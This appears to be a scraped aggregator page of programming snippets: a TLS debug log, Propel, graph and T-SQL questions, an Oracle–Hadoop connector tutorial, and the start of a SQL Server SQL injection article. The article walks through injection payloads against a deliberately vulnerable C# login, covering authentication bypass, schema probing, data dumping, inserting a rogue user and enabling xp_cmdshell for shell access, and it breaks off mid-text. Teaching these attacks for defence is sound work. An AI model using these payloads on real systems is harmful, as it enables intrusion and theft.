[TLS_EMPTY_RENEGOTIATION_INFO_SCSV, TLS_DH_anon_WITH_AES_128_CBC_SHA, SSL_DH_anon_WITH_3DES_EDE_CBC_SHA, SSL_DH_anon_WITH_RC4_128_MD5] Compression Methods: { 0 } Unsupported extension signature_algorithms, data: 00:06:05:01:04:01:02:01 *** [read] MD5 and SHA1 hashes: len = 65 0000: 01 00 00 3D 03 03 50 83 1E 0B 56 19 25 65 C8 F2 ...=..P...V.%e.. 0010: AF 02 AD 48 FE E2 92 CF B8 D7 A6 A3 EA C5 FF 5D ...H...........] 0020: 74 0F 1B C1 99 18 00 00 08 00 FF 00 34 00 1B 00 t...........4... 0030: 18 01 00 00 0C 00 0D 00 08 00 06 05 01 04 01 02 ................ 0040: 01 . %% Created: [Session-1, TLS_DH_anon_WITH_AES_128_CBC_SHA] *** ServerHello, TLSv1 RandomCookie: GMT: 1333992972 bytes = { 100, 3, 56, 153, 7, 2, 251, 64, 41, 32, 66, 240, 227, 181, 55, 190, 2, 237, 146, 0, 73, 119, 70, 0, 160, 9, 28, 207 } Session ID: {80, 131, 30, 12, 241, 73, 52, 38, 46, 41, 237, 226, 199, 246, 156, 45, 3, 247, 182, 43, 223, 8, 49, 169, 188, 63, 160, 41, 102, 199, 50, 190} Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA Compression Method: 0 Extension renegotiation_info, renegotiated_connection: <empty> *** Cipher suite: TLS_DH_anon_WITH_AES_128_CBC_SHA *** Diffie-Hellman ServerKeyExchange DH Modulus: { 233, 230, 66, 89, 157, 53, 95, 55, 201, 127, 253, 53, 103, 18, 11, 142, 37, 201, 205, 67, 233, 39, 179, 169, 103, 15, 190, 197, 216, 144, 20, 25, 34, 210, 195, 179, 173, 36, 128, 9, 55, 153, 134, 157, 30, 132, 106, 171, 73, 250, 176, 173, 38, 210, 206, 106, 34, 33, 157, 71, 11, 206, 125, 119, 125, 74, 33, 251, 233, 194, 112, 181, 127, 96, 112, 2, 243, 206, 248, 57, 54, 148, 207, 69, 238, 54, 136, 193, 26, 140, 86, 171, 18, 122, 61, 175 } DH Base: { 48, 71, 10, 213, 160, 5, 251, 20, 206, 45, 157, 205, 135, 227, 139, 199, 209, 177, 197, 250, 203, 174, 203, 233, 95, 25, 10, 167, 163, 29, 35, 196, 219, 188, 190, 6, 23, 69, 68, 64, 26, 91, 44, 2, 9, 101, 216, 194, 189, 33, 113, 211, 102, 132, 69, 119, 31, 116, 186, 8, 77, 32, 41, 216, 60, 28, 21, 133, 71, 243, 169, 241, 162, 113, 91, 226, 61, 81, 174, 77, 62, 90, 31, 106, 112, 100, 243, 22, 147, 58, 52, 109, 63, 82, 146, 82 } Server DH Public Key: { 8, 60, 59, 13, 224, 110, 32, 168, 116, 139, 246, 146, 15, 12, 216, 107, 82, 182, 140, 80, 193, 237, 159, 189, 87, 34, 18, 197, 181, 252, 26, 27, 94, 160, 188, 162, 30, 29, 165, 165, 68, 152, 11, 204, 251, 187, 14, 233, 239, 103, 134, 168, 181, 173, 206, 151, 197, 128, 65, 239, 233, 191, 29, 196, 93, 80, 217, 55, 81, 240, 101, 31, 119, 98, 188, 211, 52, 146, 168, 127, 127, 66, 63, 111, 198, 134, 70, 213, 31, 162, 146, 25, 178, 79, 56, 116 } Anonymous *** ServerHelloDone [write] MD5 and SHA1 hashes: len = 383 0000: 02 00 00 4D 03 01 50 83 1E 0C 64 03 38 99 07 02 ...M..P...d.8... 0010: FB 40 29 20 42 F0 E3 B5 37 BE 02 ED 92 00 49 77 .@) B...7.....Iw 0020: 46 00 A0 09 1C CF 20 50 83 1E 0C F1 49 34 26 2E F..... P....I4&. 0030: 29 ED E2 C7 F6 9C 2D 03 F7 B6 2B DF 08 31 A9 BC ).....-...+..1.. 0040: 3F A0 29 66 C7 32 BE 00 34 00 00 05 FF 01 00 01 ?.)f.2..4....... 0050: 00 0C 00 01 26 00 60 E9 E6 42 59 9D 35 5F 37 C9 ....&.`..BY.5_7. 0060: 7F FD 35 67 12 0B 8E 25 C9 CD 43 E9 27 B3 A9 67 ..5g...%..C.'..g 0070: 0F BE C5 D8 90 14 19 22 D2 C3 B3 AD 24 80 09 37 ......."....$..7 0080: 99 86 9D 1E 84 6A AB 49 FA B0 AD 26 D2 CE 6A 22 .....j.I...&..j" 0090: 21 9D 47 0B CE 7D 77 7D 4A 21 FB E9 C2 70 B5 7F !.G...w.J!...p.. 00A0: 60 70 02 F3 CE F8 39 36 94 CF 45 EE 36 88 C1 1A `p....96..E.6... 00B0: 8C 56 AB 12 7A 3D AF 00 60 30 47 0A D5 A0 05 FB .V..z=..`0G..... 00C0: 14 CE 2D 9D CD 87 E3 8B C7 D1 B1 C5 FA CB AE CB ..-............. 00D0: E9 5F 19 0A A7 A3 1D 23 C4 DB BC BE 06 17 45 44 ._.....#......ED 00E0: 40 1A 5B 2C 02 09 65 D8 C2 BD 21 71 D3 66 84 45 @.[,..e...!q.f.E 00F0: 77 1F 74 BA 08 4D 20 29 D8 3C 1C 15 85 47 F3 A9 w.t..M ).<...G.. 0100: F1 A2 71 5B E2 3D 51 AE 4D 3E 5A 1F 6A 70 64 F3 ..q[.=Q.M>Z.jpd. 0110: 16 93 3A 34 6D 3F 52 92 52 00 60 08 3C 3B 0D E0 ..:4m?R.R.`.<;.. 0120: 6E 20 A8 74 8B F6 92 0F 0C D8 6B 52 B6 8C 50 C1 n .t......kR..P. 0130: ED 9F BD 57 22 12 C5 B5 FC 1A 1B 5E A0 BC A2 1E ...W"......^.... 0140: 1D A5 A5 44 98 0B CC FB BB 0E E9 EF 67 86 A8 B5 ...D........g... 0150: AD CE 97 C5 80 41 EF E9 BF 1D C4 5D 50 D9 37 51 .....A.....]P.7Q 0160: F0 65 1F 77 62 BC D3 34 92 A8 7F 7F 42 3F 6F C6 .e.wb..4....B?o. 0170: 86 46 D5 1F A2 92 19 B2 4F 38 74 0E 00 00 00 .F......O8t.... URT-, WRITE: TLSv1 Handshake, length = 383 [Raw write]: length = 388 0000: 16 03 01 01 7F 02 00 00 4D 03 01 50 83 1E 0C 64 ........M..P...d 0010: 03 38 99 07 02 FB 40 29 20 42 F0 E3 B5 37 BE 02 .8....@) B...7.. 0020: ED 92 00 49 77 46 00 A0 09 1C CF 20 50 83 1E 0C ...IwF..... P... 0030: F1 49 34 26 2E 29 ED E2 C7 F6 9C 2D 03 F7 B6 2B .I4&.).....-...+ 0040: DF 08 31 A9 BC 3F A0 29 66 C7 32 BE 00 34 00 00 ..1..?.)f.2..4.. 0050: 05 FF 01 00 01 00 0C 00 01 26 00 60 E9 E6 42 59 .........&.`..BY 0060: 9D 35 5F 37 C9 7F FD 35 67 12 0B 8E 25 C9 CD 43 .5_7...5g...%..C 0070: E9 27 B3 A9 67 0F BE C5 D8 90 14 19 22 D2 C3 B3 .'..g......."... 0080: AD 24 80 09 37 99 86 9D 1E 84 6A AB 49 FA B0 AD .$..7.....j.I... 0090: 26 D2 CE 6A 22 21 9D 47 0B CE 7D 77 7D 4A 21 FB &..j"!.G...w.J!. 00A0: E9 C2 70 B5 7F 60 70 02 F3 CE F8 39 36 94 CF 45 ..p..`p....96..E 00B0: EE 36 88 C1 1A 8C 56 AB 12 7A 3D AF 00 60 30 47 .6....V..z=..`0G 00C0: 0A D5 A0 05 FB 14 CE 2D 9D CD 87 E3 8B C7 D1 B1 .......-........ 00D0: C5 FA CB AE CB E9 5F 19 0A A7 A3 1D 23 C4 DB BC ......_.....#... 00E0: BE 06 17 45 44 40 1A 5B 2C 02 09 65 D8 C2 BD 21 ...ED@.[,..e...! 00F0: 71 D3 66 84 45 77 1F 74 BA 08 4D 20 29 D8 3C 1C q.f.Ew.t..M ).<. 0100: 15 85 47 F3 A9 F1 A2 71 5B E2 3D 51 AE 4D 3E 5A ..G....q[.=Q.M>Z 0110: 1F 6A 70 64 F3 16 93 3A 34 6D 3F 52 92 52 00 60 .jpd...:4m?R.R.` 0120: 08 3C 3B 0D E0 6E 20 A8 74 8B F6 92 0F 0C D8 6B .<;..n .t......k 0130: 52 B6 8C 50 C1 ED 9F BD 57 22 12 C5 B5 FC 1A 1B R..P....W"...... 0140: 5E A0 BC A2 1E 1D A5 A5 44 98 0B CC FB BB 0E E9 ^.......D....... 0150: EF 67 86 A8 B5 AD CE 97 C5 80 41 EF E9 BF 1D C4 .g........A..... 0160: 5D 50 D9 37 51 F0 65 1F 77 62 BC D3 34 92 A8 7F ]P.7Q.e.wb..4... 0170: 7F 42 3F 6F C6 86 46 D5 1F A2 92 19 B2 4F 38 74 .B?o..F......O8t 0180: 0E 00 00 00 .... [Raw read]: length = 5 0000: 15 03 01 00 02 ..... [Raw read]: length = 2 0000: 02 00 .. URT-, READ: TLSv1 Alert, length = 2 URT-, RECV TLSv1 ALERT: fatal, close_notify URT-, called closeSocket() URT-, handling exception: javax.net.ssl.SSLException: Received fatal alert: close_notify FYI, this works in iOS 6.0

  Read the article

• Selecting date NOT NULL records between a specific range with Propel

  - by Jon Winstanley

  Using Propel I would like to find records which have a date field which is not null and also between a specific range. However, Propel seems to overwrite the criteria with the NOTNULL criteria. Is it possible to do this? //create the date ranges $start_date = mktime(0, 0, 0, date("m") , date("d")+$start, date("Y")); $end_date = mktime(0, 0, 0, date("m") , date("d")+$end, date("Y")); //add the start of the range $c1 = $c->getNewCriterion(TaskPeer::DUE_DATE, null); $c1->addAnd($c->getNewCriterion(TaskPeer::DUE_DATE, $end_date, Criteria::LESS_EQUAL)); $c->add($c1); //add the end of the range $c2 = $c->getNewCriterion(TaskPeer::DUE_DATE, null); $c2->addAnd($c->getNewCriterion(TaskPeer::DUE_DATE, $start_date, Criteria::GREATER_EQUAL)); $c->add($c2); //remove the null entries $c3 = $c->getNewCriterion(TaskPeer::DUE_DATE, null); $c3->addAnd($c->getNewCriterion(TaskPeer::DUE_DATE, null, Criteria::ISNULL)); $c->add($c3);

  Read the article

• Seperating two graphs based on connectivity and coordinates

  - by martin

  I would like to separate existing data of vertices and edges into two or more graphs that are not connected. I would like to give the following as example: Imagine two hexagons on top of each other but are lying in different Z. Hexagon 1 has the following vertices A(0,0,1), B(1,0,2), C(2,1,2), D(1,2,1), E(0,2,1), F(-1,2,1). The connectivity is as following: A-B, B-C, C-D, D-E, E-F, F-A. This part of Graph 1 as all the vertices are connected in this layer. Hexagon2 has the following vertices A1(0,0,6), B1(1,0,7), C1(2,1,7), D1(1,2,8), E1(0,2,7), F1(-1,2,6). The connectivity is as following: A1-B1, B1-C1, C1-D1, D1-E1, E1-F1, F1-A1. This is part of Graph 2 My data is in the following form: list of Vertices and list of Edges that i can form graphs with. I would like to eliminate graph 2 and give only vertices and connectivity of graph 1 to polygon determination part of my algorithm. My real data contains around 1000 connected polygons as graph 1 and around 100 (much larger in area) polygons as graph 2. I would like to eliminate graph 2. I am programming this in python. Thanks in advance.

  Read the article

• Help needed for writing a Set Based query for finding the highest marks obtained by the students

  - by priyanka.sarkar_2

  I have the below table declare @t table (id int identity, name varchar(50),sub1 int,sub2 int,sub3 int,sub4 int) insert into @t select 'name1',20,30,40,50 union all select 'name2',10,30,40,50 union all select 'name3',40,60,100,50 union all select 'name4',80,30,40,80 union all select 'name5',80,70,40,50 union all select 'name6',10,30,40,80 The desired output should be Id Name Sub1 Sub2 Sub3 Sub4 3 Name3 100 4 Name4 80 80 5 Name5 80 70 6 Name6 80 What I have done so far is ;with cteSub1 as ( select rn1 = dense_rank() over(order by sub1 desc),t.id,t.name,t.sub1 from @t t ) ,cteSub2 as ( select rn2 = dense_rank() over(order by sub2 desc),t.id,t.name,t.sub2 from @t t ) ,cteSub3 as ( select rn3 = dense_rank() over(order by sub3 desc),t.id,t.name,t.sub3 from @t t ) ,cteSub4 as ( select rn4 = dense_rank() over(order by sub4 desc),t.id,t.name,t.sub4 from @t t ) select x1.id,x2.id,x3.id,x4.id ,x1.sub1,x2.sub2,x3.sub3,x4.sub4 from (select c1.id,c1.sub1 from cteSub1 c1 where rn1 =1) as x1 full join (select c2.id,c2.sub2 from cteSub2 c2 where rn2 =1)x2 on x1.id = x2.id full join (select c3.id,c3.sub3 from cteSub3 c3 where rn3 =1)x3 on x1.id = x3.id full join (select c4.id,c4.sub4 from cteSub4 c4 where rn4 =1)x4 on x1.id = x4.id which is giving me the output as id id id id sub1 sub2 sub3 sub4 5 5 NULL NULL 80 70 NULL NULL 4 NULL NULL 4 80 NULL NULL 80 NULL NULL 3 NULL NULL NULL 100 NULL NULL NULL NULL 6 NULL NULL NULL 80 Help needed. Also how can I reduce the number of CTE's?

  Read the article

• Running a simple integration scenario using the Oracle Big Data Connectors on Hadoop/HDFS cluster

  - by hamsun

  Between the elephant ( the tradional image of the Hadoop framework) and the Oracle Iron Man (Big Data..) an english setter could be seen as the link to the right data Data, Data, Data, we are living in a world where data technology based on popular applications , search engines, Webservers, rich sms messages, email clients, weather forecasts and so on, have a predominant role in our life. More and more technologies are used to analyze/track our behavior, try to detect patterns, to propose us "the best/right user experience" from the Google Ad services, to Telco companies or large consumer sites (like Amazon:) ). The more we use all these technologies, the more we generate data, and thus there is a need of huge data marts and specific hardware/software servers (as the Exadata servers) in order to treat/analyze/understand the trends and offer new services to the users. Some of these "data feeds" are raw, unstructured data, and cannot be processed effectively by normal SQL queries. Large scale distributed processing was an emerging infrastructure need and the solution seemed to be the "collocation of compute nodes with the data", which in turn leaded to MapReduce parallel patterns and the development of the Hadoop framework, which is based on MapReduce and a distributed file system (HDFS) that runs on larger clusters of rather inexpensive servers. Several Oracle products are using the distributed / aggregation pattern for data calculation ( Coherence, NoSql, times ten ) so once that you are familiar with one of these technologies, lets says with coherence aggregators, you will find the whole Hadoop, MapReduce concept very similar. Oracle Big Data Appliance is based on the Cloudera Distribution (CDH), and the Oracle Big Data Connectors can be plugged on a Hadoop cluster running the CDH distribution or equivalent Hadoop clusters. In this paper, a "lab like" implementation of this concept is done on a single Linux X64 server, running an Oracle Database 11g Enterprise Edition Release 11.2.0.4.0, and a single node Apache hadoop-1.2.1 HDFS cluster, using the SQL connector for HDFS. The whole setup is fairly simple: Install on a Linux x64 server ( or virtual box appliance) an Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 server Get the Apache Hadoop distribution from: http://mir2.ovh.net/ftp.apache.org/dist/hadoop/common/hadoop-1.2.1. Get the Oracle Big Data Connectors from: http://www.oracle.com/technetwork/bdc/big-data-connectors/downloads/index.html?ssSourceSiteId=ocomen. Check the java version of your Linux server with the command: java -version java version "1.7.0_40" Java(TM) SE Runtime Environment (build 1.7.0_40-b43) Java HotSpot(TM) 64-Bit Server VM (build 24.0-b56, mixed mode) Decompress the hadoop hadoop-1.2.1.tar.gz file to /u01/hadoop-1.2.1 Modify your .bash_profile export HADOOP_HOME=/u01/hadoop-1.2.1 export PATH=$PATH:$HADOOP_HOME/bin export HIVE_HOME=/u01/hive-0.11.0 export PATH=$PATH:$HADOOP_HOME/bin:$HIVE_HOME/bin (also see my sample .bash_profile) Set up ssh trust for Hadoop process, this is a mandatory step, in our case we have to establish a "local trust" as will are using a single node configuration copy the new public keys to the list of authorized keys connect and test the ssh setup to your localhost: We will run a "pseudo-Hadoop cluster", in what is called "local standalone mode", all the Hadoop java components are running in one Java process, this is enough for our demo purposes. We need to "fine tune" some Hadoop configuration files, we have to go at our $HADOOP_HOME/conf, and modify the files: core-site.xml hdfs-site.xml mapred-site.xml check that the hadoop binaries are referenced correctly from the command line by executing: hadoop -version As Hadoop is managing our "clustered HDFS" file system we have to create "the mount point" and format it , the mount point will be declared to core-site.xml as: The layout under the /u01/hadoop-1.2.1/data will be created and used by other hadoop components (MapReduce = /mapred/...) HDFS is using the /dfs/... layout structure format the HDFS hadoop file system: Start the java components for the HDFS system As an additional check, you can use the GUI Hadoop browsers to check the content of your HDFS configurations: Once our HDFS Hadoop setup is done you can use the HDFS file system to store data ( big data : )), and plug them back and forth to Oracle Databases by the means of the Big Data Connectors ( which is the next configuration step). You can create / use a Hive db, but in our case we will make a simple integration of "raw data" , through the creation of an External Table to a local Oracle instance ( on the same Linux box, we run the Hadoop HDFS one node cluster and one Oracle DB). Download some public "big data", I use the site: http://france.meteofrance.com/france/observations, from where I can get *.csv files for my big data simulations :). Here is the data layout of my example file: Download the Big Data Connector from the OTN (oraosch-2.2.0.zip), unzip it to your local file system (see picture below) Modify your environment in order to access the connector libraries , and make the following test: [oracle@dg1 bin]$./hdfs_stream Usage: hdfs_stream locationFile [oracle@dg1 bin]$ Load the data to the Hadoop hdfs file system: hadoop fs -mkdir bgtest_data hadoop fs -put obsFrance.txt bgtest_data/obsFrance.txt hadoop fs -ls /user/oracle/bgtest_data/obsFrance.txt [oracle@dg1 bg-data-raw]$ hadoop fs -ls /user/oracle/bgtest_data/obsFrance.txt Found 1 items -rw-r--r-- 1 oracle supergroup 54103 2013-10-22 06:10 /user/oracle/bgtest_data/obsFrance.txt [oracle@dg1 bg-data-raw]$hadoop fs -ls hdfs:///user/oracle/bgtest_data/obsFrance.txt Found 1 items -rw-r--r-- 1 oracle supergroup 54103 2013-10-22 06:10 /user/oracle/bgtest_data/obsFrance.txt Check the content of the HDFS with the browser UI: Start the Oracle database, and run the following script in order to create the Oracle database user, the Oracle directories for the Oracle Big Data Connector (dg1 it’s my own db id replace accordingly yours): #!/bin/bash export ORAENV_ASK=NO export ORACLE_SID=dg1 . oraenv sqlplus /nolog <<EOF CONNECT / AS sysdba; CREATE OR REPLACE DIRECTORY osch_bin_path AS '/u01/orahdfs-2.2.0/bin'; CREATE USER BGUSER IDENTIFIED BY oracle; GRANT CREATE SESSION, CREATE TABLE TO BGUSER; GRANT EXECUTE ON sys.utl_file TO BGUSER; GRANT READ, EXECUTE ON DIRECTORY osch_bin_path TO BGUSER; CREATE OR REPLACE DIRECTORY BGT_LOG_DIR as '/u01/BG_TEST/logs'; GRANT READ, WRITE ON DIRECTORY BGT_LOG_DIR to BGUSER; CREATE OR REPLACE DIRECTORY BGT_DATA_DIR as '/u01/BG_TEST/data'; GRANT READ, WRITE ON DIRECTORY BGT_DATA_DIR to BGUSER; EOF Put the following in a file named t3.sh and make it executable, hadoop jar $OSCH_HOME/jlib/orahdfs.jar \ oracle.hadoop.exttab.ExternalTable \ -D oracle.hadoop.exttab.tableName=BGTEST_DP_XTAB \ -D oracle.hadoop.exttab.defaultDirectory=BGT_DATA_DIR \ -D oracle.hadoop.exttab.dataPaths="hdfs:///user/oracle/bgtest_data/obsFrance.txt" \ -D oracle.hadoop.exttab.columnCount=7 \ -D oracle.hadoop.connection.url=jdbc:oracle:thin:@//localhost:1521/dg1 \ -D oracle.hadoop.connection.user=BGUSER \ -D oracle.hadoop.exttab.printStackTrace=true \ -createTable --noexecute then test the creation fo the external table with it: [oracle@dg1 samples]$ ./t3.sh ./t3.sh: line 2: /u01/orahdfs-2.2.0: Is a directory Oracle SQL Connector for HDFS Release 2.2.0 - Production Copyright (c) 2011, 2013, Oracle and/or its affiliates. All rights reserved. Enter Database Password:] The create table command was not executed. The following table would be created. CREATE TABLE "BGUSER"."BGTEST_DP_XTAB" ( "C1" VARCHAR2(4000), "C2" VARCHAR2(4000), "C3" VARCHAR2(4000), "C4" VARCHAR2(4000), "C5" VARCHAR2(4000), "C6" VARCHAR2(4000), "C7" VARCHAR2(4000) ) ORGANIZATION EXTERNAL ( TYPE ORACLE_LOADER DEFAULT DIRECTORY "BGT_DATA_DIR" ACCESS PARAMETERS ( RECORDS DELIMITED BY 0X'0A' CHARACTERSET AL32UTF8 STRING SIZES ARE IN CHARACTERS PREPROCESSOR "OSCH_BIN_PATH":'hdfs_stream' FIELDS TERMINATED BY 0X'2C' MISSING FIELD VALUES ARE NULL ( "C1" CHAR(4000), "C2" CHAR(4000), "C3" CHAR(4000), "C4" CHAR(4000), "C5" CHAR(4000), "C6" CHAR(4000), "C7" CHAR(4000) ) ) LOCATION ( 'osch-20131022081035-74-1' ) ) PARALLEL REJECT LIMIT UNLIMITED; The following location files would be created. osch-20131022081035-74-1 contains 1 URI, 54103 bytes 54103 hdfs://localhost:19000/user/oracle/bgtest_data/obsFrance.txt Then remove the --noexecute flag and create the external Oracle table for the Hadoop data. Check the results: The create table command succeeded. CREATE TABLE "BGUSER"."BGTEST_DP_XTAB" ( "C1" VARCHAR2(4000), "C2" VARCHAR2(4000), "C3" VARCHAR2(4000), "C4" VARCHAR2(4000), "C5" VARCHAR2(4000), "C6" VARCHAR2(4000), "C7" VARCHAR2(4000) ) ORGANIZATION EXTERNAL ( TYPE ORACLE_LOADER DEFAULT DIRECTORY "BGT_DATA_DIR" ACCESS PARAMETERS ( RECORDS DELIMITED BY 0X'0A' CHARACTERSET AL32UTF8 STRING SIZES ARE IN CHARACTERS PREPROCESSOR "OSCH_BIN_PATH":'hdfs_stream' FIELDS TERMINATED BY 0X'2C' MISSING FIELD VALUES ARE NULL ( "C1" CHAR(4000), "C2" CHAR(4000), "C3" CHAR(4000), "C4" CHAR(4000), "C5" CHAR(4000), "C6" CHAR(4000), "C7" CHAR(4000) ) ) LOCATION ( 'osch-20131022081719-3239-1' ) ) PARALLEL REJECT LIMIT UNLIMITED; The following location files were created. osch-20131022081719-3239-1 contains 1 URI, 54103 bytes 54103 hdfs://localhost:19000/user/oracle/bgtest_data/obsFrance.txt This is the view from the SQL Developer: and finally the number of lines in the oracle table, imported from our Hadoop HDFS cluster SQL select count(*) from "BGUSER"."BGTEST_DP_XTAB"; COUNT(*) ---------- 1151 In a next post we will integrate data from a Hive database, and try some ODI integrations with the ODI Big Data connector. Our simplistic approach is just a step to show you how these unstructured data world can be integrated to Oracle infrastructure. Hadoop, BigData, NoSql are great technologies, they are widely used and Oracle is offering a large integration infrastructure based on these services. Oracle University presents a complete curriculum on all the Oracle related technologies: NoSQL: Introduction to Oracle NoSQL Database Using Oracle NoSQL Database Big Data: Introduction to Big Data Oracle Big Data Essentials Oracle Big Data Overview Oracle Data Integrator: Oracle Data Integrator 12c: New Features Oracle Data Integrator 11g: Integration and Administration Oracle Data Integrator: Administration and Development Oracle Data Integrator 11g: Advanced Integration and Development Oracle Coherence 12c: Oracle Coherence 12c: New Features Oracle Coherence 12c: Share and Manage Data in Clusters Oracle Coherence 12c: Oracle GoldenGate 11g: Fundamentals for Oracle Oracle GoldenGate 11g: Fundamentals for SQL Server Oracle GoldenGate 11g Fundamentals for Oracle Oracle GoldenGate 11g Fundamentals for DB2 Oracle GoldenGate 11g Fundamentals for Teradata Oracle GoldenGate 11g Fundamentals for HP NonStop Oracle GoldenGate 11g Management Pack: Overview Oracle GoldenGate 11g Troubleshooting and Tuning Oracle GoldenGate 11g: Advanced Configuration for Oracle Other Resources: Apache Hadoop : http://hadoop.apache.org/ is the homepage for these technologies. "Hadoop Definitive Guide 3rdEdition" by Tom White is a classical lecture for people who want to know more about Hadoop , and some active "googling " will also give you some more references. About the author: Eugene Simos is based in France and joined Oracle through the BEA-Weblogic Acquisition, where he worked for the Professional Service, Support, end Education for major accounts across the EMEA Region. He worked in the banking sector, ATT, Telco companies giving him extensive experience on production environments. Eugen currently specializes in Oracle Fusion Middleware teaching an array of courses on Weblogic/Webcenter, Content,BPM /SOA/Identity-Security/GoldenGate/Virtualisation/Unified Comm Suite) throughout the EMEA region.

  Read the article

• SQL Server SQL Injection from start to end

  - by Mladen Prajdic

  SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username 